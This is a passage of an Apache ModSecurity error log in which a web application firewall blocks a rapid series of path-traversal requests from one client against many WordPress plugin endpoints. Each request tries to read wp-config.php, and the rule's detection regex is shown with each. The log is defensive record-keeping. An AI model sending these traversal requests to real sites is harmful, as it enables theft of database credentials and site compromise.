"/wp-content/plugins/s3bubble-amazon-s3-html-5-video-with-adverts/assets/plugins/ultimate/content/downloader.php"] [unique_id "Y0ZxReLrJ0tgpRmNRAaHfQAAAMA"] [Wed Oct 12 02:48:21.333193 2022] [:error] [pid 22972:tid 140534324578048] [client 185.189.115.30:49718] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/se-html5-album-audio-player/download_audio.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/se-html5-album-audio-player/download_audio.php"] [unique_id "Y0ZxReLrJ0tgpRmNRAaHfgAAANg"] [Wed Oct 12 02:48:21.484088 2022] [:error] [pid 22972:tid 140534484039424] [client 185.189.115.30:49720] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sell-downloads/sell-downloads.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sell-downloads/sell-downloads.php"] [unique_id "Y0ZxReLrJ0tgpRmNRAaHfwAAAMU"] [Wed Oct 12 02:48:21.635076 2022] [:error] [pid 22972:tid 140534400112384] [client 185.189.115.30:49722] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sf-booking/lib/downloads.php?file=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sf-booking/lib/downloads.php"] [unique_id "Y0ZxReLrJ0tgpRmNRAaHgAAAAM8"] [Wed Oct 12 02:48:21.838978 2022] [:error] [pid 22339:tid 140534564054784] [client 185.189.115.30:49726] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php?file=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-download-button-shortcode/simple-download-button_dl.php"] [unique_id "Y0ZxRdmZws0mEkXxGo-VIwAAAIQ"] [Wed Oct 12 02:48:21.989789 2022] [:error] [pid 22339:tid 140534349756160] [client 185.189.115.30:49728] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-fields/simple_fields.php?wp_abspath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-fields/simple_fields.php"] [unique_id "Y0ZxRdmZws0mEkXxGo-VJAAAAJU"] [Wed Oct 12 02:48:22.142107 2022] [:error] [pid 22339:tid 140534442075904] [client 185.189.115.30:49730] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/simple-image-manipulator/controller/download.php"] [unique_id "Y0ZxRtmZws0mEkXxGo-VJQAAAIo"] [Wed Oct 12 02:48:22.294690 2022] [:error] [pid 22972:tid 140534332970752] [client 185.189.115.30:49734] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php"] [unique_id "Y0ZxRuLrJ0tgpRmNRAaHgQAAANc"] [Wed Oct 12 02:48:22.446090 2022] [:error] [pid 22972:tid 140534383326976] [client 185.189.115.30:49738] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/site-import/admin/page.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/site-import/admin/page.php"] [unique_id "Y0ZxRuLrJ0tgpRmNRAaHggAAANE"] [Wed Oct 12 02:48:22.596572 2022] [:error] [pid 22337:tid 140534442075904] [client 185.189.115.30:49740] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/sniplets/modules/syntax_highlight.php"] [unique_id "Y0ZxRqBKlkjFPqrcdjM3ogAAAAo"] [Wed Oct 12 02:48:22.747541 2022] [:error] [pid 22339:tid 140534358148864] [client 185.189.115.30:49742] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php"] [unique_id "Y0ZxRtmZws0mEkXxGo-VJgAAAJQ"] [Wed Oct 12 02:48:22.899239 2022] [:error] [pid 22337:tid 140534349756160] [client 185.189.115.30:49744] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/treemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/treemap.php"] [unique_id "Y0ZxRqBKlkjFPqrcdjM3owAAABU"] [Wed Oct 12 02:48:23.055028 2022] [:error] [pid 22339:tid 140534366541568] [client 185.189.115.30:49746] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tera-charts/charts/zoomabletreemap.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VJwAAAJM"] [Wed Oct 12 02:48:23.205797 2022] [:error] [pid 22339:tid 140534341363456] [client 185.189.115.30:49748] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thecartpress/checkout/CheckoutEditor.php?tcp_save_fields=true&tcp_class_name=asdf&tcp_class_path=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thecartpress/checkout/CheckoutEditor.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VKAAAAJY"] [Wed Oct 12 02:48:23.356773 2022] [:error] [pid 22339:tid 140534484039424] [client 185.189.115.30:49750] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/thinkun-remind/exportData.php?dirPath=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/thinkun-remind/exportData.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VKQAAAIU"] [Wed Oct 12 02:48:23.520995 2022] [:error] [pid 22339:tid 140534374934272] [client 185.189.115.30:49752] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php?href=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/tinymce-thumbnail-gallery/php/download-image.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VKgAAAJI"] [Wed Oct 12 02:48:23.672546 2022] [:error] [pid 22339:tid 140534400112384] [client 185.189.115.30:49754] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/ungallery/source_vuln.php?pic=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/ungallery/source_vuln.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VKwAAAI8"] [Wed Oct 12 02:48:23.829757 2022] [:error] [pid 22339:tid 140534458861312] [client 185.189.115.30:49756] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php?demo=..%2F..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/website-contact-form-with-file-upload/lib/wide-image/image-processor.php"] [unique_id "Y0ZxR9mZws0mEkXxGo-VLAAAAIg"] [Wed Oct 12 02:48:24.027148 2022] [:error] [pid 22339:tid 140534589232896] [client 185.189.115.30:49758] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wechat-broadcast/wechat/Image.php?url=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wechat-broadcast/wechat/Image.php"] [unique_id "Y0ZxSNmZws0mEkXxGo-VLQAAAIE"] [Wed Oct 12 02:48:24.177893 2022] [:error] [pid 22339:tid 140534383326976] [client 185.189.115.30:49760] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wordtube/wordtube-button.php"] [unique_id "Y0ZxSNmZws0mEkXxGo-VLgAAAJE"] [Wed Oct 12 02:48:24.329228 2022] [:error] [pid 22339:tid 140534597625600] [client 185.189.115.30:49762] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-custom-pages/wp-download.php"] [unique_id "Y0ZxSNmZws0mEkXxGo-VLwAAAIA"] [Wed Oct 12 02:48:24.480452 2022] [:error] [pid 22339:tid 140534475646720] [client 185.189.115.30:49764] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php?filename=..%2F..%2F..%2F..%2Fwp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wp-ecommerce-shop-styling/includes/download.php"] [unique_id "Y0ZxSNmZws0mEkXxGo-VMAAAAIY"] [Wed Oct 12 02:48:24.631445 2022] [:error] [pid 22972:tid 140534408505088] [client 185.189.115.30:49766] [client 185.189.115.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: %2F..%2F found within REQUEST_URI: /wp-content/plugins/wp-filemanager/incl/libfile.php?&path=..%2F..%2F..%2F..%2F&filename=wp-config.php&action=download"] [severity "CRITICAL"] [ver 